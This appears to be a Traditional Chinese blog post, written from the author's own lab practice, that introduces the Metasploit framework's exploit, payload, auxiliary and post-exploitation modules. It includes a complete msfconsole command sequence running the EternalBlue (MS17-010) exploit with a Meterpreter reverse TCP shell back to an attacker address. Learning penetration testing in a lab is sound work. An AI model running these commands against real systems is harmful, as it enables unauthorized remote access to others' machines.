以下內容皆是筆者在自己的操作機、靶機上進行練習。
Metasploit 是一個開源的滲透測試框架,廣泛用於安全研究和漏洞評估。它提供了一個平台來開發、測試和執行漏洞利用(exploits)和其他攻擊技術。
功能:Metasploit 提供了一個廣泛的漏洞利用模塊庫,這些模塊可以用來利用系統中的已知漏洞。這些漏洞利用模塊可以對目標系統進行攻擊,測試其安全性。
範例:利用已知的軟件漏洞來獲取對系統的未授權訪問。
Metasploit 的 payload 是攻擊成功後在目標系統上執行的代碼。常見的 payload 包括反向 shell(reverse shell)、本地提權(local privilege escalation)和後門(backdoor)。
這些模塊提供了各種額外的功能,如掃描、嗅探和破解。它們不直接利用漏洞,但可以幫助收集信息和進行其他攻擊前的準備工作。
在攻擊成功後,後期處理模塊用於進一步操作目標系統,例如提權、收集系統信息和維持存取。
Metasploit 有一個免費的開源社區版本,以及一個功能更強大、支持更多企業功能的商業版本(Metasploit Pro)。商業版本提供了更多的自動化功能和報告工具。
Metasploit 可以在多種操作系統上運行,包括 Linux、Windows 和 macOS。它支持多種攻擊平台,使得滲透測試能夠在不同環境中進行。
msfconsole
search exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.105
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.104
exploit
參考來源:
- HTB_Headless
自動化攻擊腳本-Metasploit
今天下午就要出國去日本玩了~
希望明天不要忘記發最後一篇